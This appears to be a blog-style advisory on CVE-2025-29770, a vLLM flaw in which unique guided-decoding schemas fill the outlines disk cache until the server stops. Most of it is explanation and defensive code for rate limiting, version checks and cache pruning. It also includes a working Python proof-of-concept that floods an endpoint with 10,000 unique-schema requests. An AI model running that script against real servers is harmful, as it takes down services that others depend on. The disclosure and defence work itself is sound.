

CVE-2025-29770 is a security vulnerability discovered in vLLM, a high-throughput, memory-efficient engine for running large language models (LLMs). The issue impacts any vLLM deployment that uses the outlines library as a backend for structured output — also known as guided decoding.

The vulnerability allows a remote, unauthenticated attacker to trigger a Denial of Service (DoS) by filling up the server's filesystem. This happens by abusing a local cache meant for compiled grammars, which the outlines library stores without any cleanup or size limiting. The attacker only needs to make repeated requests with unique schemas.

Let's break down how this works, what the vulnerable code looks like, and how you can protect yourself.

How Does Outlines Structured Output Work?

Many LLM users want model outputs to conform to specific structures—e.g., valid JSON, SQL statements, custom data formats. For efficiency, the vLLM project uses outlines, a library that "compiles" output grammars and caches them for faster recurring requests:

```python
# vllm/model_executor/guided_decoding/outlines_logits_processors.py
# Simplified illustration of the caching behavior, not the actual vLLM/outlines code.

from outlines import compile_grammar


def get_logits_processor(schema):
    compiled = compile_grammar(schema)  # Uses local disk cache
    # ...
    return compiled
```

Outlines stores each compiled grammar in a cache directory (usually under /tmp). By design, whenever a new schema appears, a new cached grammar file is written.
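To see why unique schemas translate directly into disk growth, here is a minimal sketch of a schema-keyed disk cache. It is not the outlines implementation: `cache_path_for`, `get_or_compile`, `count_cache_files`, and the byte string standing in for a compiled grammar are all hypothetical, and the cache directory is passed in rather than assumed.

```python
import hashlib
import json
from pathlib import Path


def cache_path_for(schema: dict, cache_dir: Path) -> Path:
    """Map a schema to a cache file named after a hash of its contents."""
    canonical = json.dumps(schema, sort_keys=True).encode("utf-8")
    return cache_dir / (hashlib.sha256(canonical).hexdigest() + ".bin")


def get_or_compile(schema: dict, cache_dir: Path) -> bytes:
    """Return the cached artifact for a schema, writing a new file on a miss."""
    path = cache_path_for(schema, cache_dir)
    if path.exists():
        return path.read_bytes()  # cache hit: nothing new is written
    # Hypothetical stand-in for the expensive grammar compilation step.
    compiled = b"compiled:" + json.dumps(schema, sort_keys=True).encode("utf-8")
    path.write_bytes(compiled)  # cache miss: one more file on disk, never removed
    return compiled


def count_cache_files(cache_dir: Path) -> int:
    """Count the regular files currently stored in the cache directory."""
    return sum(1 for p in cache_dir.iterdir() if p.is_file())
```

Calling `get_or_compile` twice with the same schema leaves a single file in the directory, while calling it with N distinct schemas leaves N files. Nothing in this sketch ever deletes an entry, which mirrors the unbounded growth described above.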

The Problem: Cache is Unrestricted

The engine and cache are fast, but there are no limits, cleanup, or controls on what a client can request. A malicious user can therefore send hundreds or thousands of requests, each with a slightly different schema, causing outlines to compile a new grammar and write a new cache file to disk, over and over, until the disk is full.

Anyone can do this – because the outlines backend is available not just to local code, but by default via vLLM's OpenAI-compatible API server. The user just needs to set the guided_decoding_backend request field to outlines.

A proof-of-concept exploit might look like the following (Python):

```python
import requests
import json
import uuid

API_URL = "http://your-vllm-server/v1/completions"

for i in range(10000):
    # Make each schema unique!
    schema = {"type": "object", "properties": {f"field_{uuid.uuid4()}": {"type": "string"}}}
    data = {
        "prompt": "Generate a response:",
        "model": "example-model",
        "extra_body": {
            "guided_decoding_backend": "outlines",  # Specify outlines backend
            "schema": schema
        }
    }
    requests.post(API_URL, json=data)
```

Under the hood? Each request spawns a new grammar and a new cache file. Eventually, /tmp or whatever disk partition is used fills up—and your entire inference server, or even other services, could halt if vital disk space is exhausted.

Why This Is Dangerous

- Default Enablement: Outlines cache is ON by default. Most vLLM installs are vulnerable unless explicitly patched or updated.

- Hard to Detect: The attack consists of many individually valid API calls, so it is hard to distinguish from legitimate traffic.

- Not Limited to Outlines-Dominated Deployments: Even if another guided decoding backend is default, the attacker can select outlines per request.

Denial of Service (DoS) occurs when the disk space runs out. At worst, your inference infrastructure, or co-hosted workloads, go down.
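Although each request looks valid on its own, one signal that may separate this traffic from ordinary use is how many distinct schemas a single client submits. The following is a minimal sketch of that idea, not a vLLM feature: `SchemaBudget`, `client_id`, and `max_distinct` are hypothetical names, and how a client is identified (API key, source address, and so on) is left to the deployment.

```python
import hashlib
import json
from collections import defaultdict


class SchemaBudget:
    """Track distinct schemas per client and refuse new ones past a limit."""

    def __init__(self, max_distinct: int) -> None:
        self.max_distinct = max_distinct
        # client_id -> set of schema digests already seen for that client
        self._seen = defaultdict(set)

    def allow(self, client_id: str, schema: dict) -> bool:
        """Return True if the request should proceed, False if over budget."""
        canonical = json.dumps(schema, sort_keys=True).encode("utf-8")
        digest = hashlib.sha256(canonical).hexdigest()
        seen = self._seen[client_id]
        if digest in seen:
            return True  # repeated schema: would hit the cache, costs no new file
        if len(seen) >= self.max_distinct:
            return False  # a new schema would exceed this client's budget
        seen.add(digest)
        return True
```

A legitimate client that reuses a handful of schemas never reaches the limit, while a client that sends a fresh schema on every call is cut off after `max_distinct` of them. This sketch keeps its state in memory and never expires entries, so a real deployment would likely want a time window and a bound on the number of tracked clients.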

Fix and Workarounds

Patched in vLLM 0.8.0:

The maintainers fixed this in vLLM v0.8.0. If you're running any earlier version, upgrade immediately.
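To check whether an environment already has the fixed release, a small script along these lines may help. It is a sketch under stated assumptions: `PATCHED`, `parse_release`, `is_patched`, and `installed_vllm_is_patched` are illustrative helpers, only `importlib.metadata.version` is a standard-library call, and suffixes such as `.post1` or `rc1` are ignored when comparing.

```python
import re
from importlib import metadata

# First release containing the fix, per the advisory text above.
PATCHED = (0, 8, 0)


def parse_release(version: str) -> tuple:
    """Extract the leading numeric release, padded to three components."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = [int(p) for p in match.group(0).split(".")]
    parts += [0] * (3 - len(parts))  # "0.8" is treated as "0.8.0"
    return tuple(parts)


def is_patched(version: str) -> bool:
    """Return True if the numeric release is at or above the patched one."""
    return parse_release(version) >= PATCHED


def installed_vllm_is_patched():
    """Check the installed vllm package; return None if it is not installed."""
    try:
        return is_patched(metadata.version("vllm"))
    except metadata.PackageNotFoundError:
        return None
```

Running `installed_vllm_is_patched()` inside the serving environment returns `True`, `False`, or `None` when vLLM is not installed there. Because pre-release suffixes are ignored, a release candidate of the patched version would be reported as patched, so treat the result as a first check rather than proof.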

- Remove or limit outlines as a backend (guided_decoding_backend).

- Manually clean or monitor the /tmp directory to catch runaway cache growth.
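The monitoring and cleanup workaround could be automated with something like the sketch below. It assumes the cache lives in a dedicated directory that you pass in yourself; `directory_size`, `prune_oldest`, and `max_bytes` are hypothetical names, and deleting files from a cache that a running process is using may not be safe for every cache format, so test this against your own setup first.

```python
import os
from pathlib import Path


def _list_files(path: Path) -> list:
    """Collect (mtime, size, file path) for every regular file under path."""
    entries = []
    for root, _dirs, files in os.walk(path):
        for name in files:
            file_path = Path(root) / name
            try:
                st = file_path.stat()
            except OSError:
                continue  # file disappeared while scanning
            entries.append((st.st_mtime, st.st_size, file_path))
    return entries


def directory_size(path: Path) -> int:
    """Total size in bytes of the files under path."""
    return sum(size for _mtime, size, _p in _list_files(path))


def prune_oldest(path: Path, max_bytes: int) -> int:
    """Delete the oldest files until the total fits max_bytes; return count removed."""
    entries = _list_files(path)
    total = sum(size for _mtime, size, _p in entries)
    removed = 0
    for _mtime, size, file_path in sorted(entries, key=lambda e: e[0]):
        if total <= max_bytes:
            break
        try:
            file_path.unlink()
        except OSError:
            continue  # could not delete; leave it and move on
        total -= size
        removed += 1
    return removed
```

A scheduled job could call `directory_size` to raise an alert when the cache crosses a threshold, and `prune_oldest` to bring it back under a budget. This only limits the damage; it does not stop an attacker from forcing repeated compilation.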


Conclusion

CVE-2025-29770 highlights how even performance optimizations like caching can become critical vulnerabilities if left unchecked. If you're running vLLM with the outlines backend (directly or via the API server), upgrade to version 0.8.0 or later as soon as possible, and keep an eye on your cache directories!

*Stay secure, keep your cache clean, and always keep an eye on those "just optimization" features!*

If you have more questions about how this issue might affect your deployment, check for updates in the vLLM GitHub repo.

Timeline

Published on: 03/19/2025 16:15:31 UTC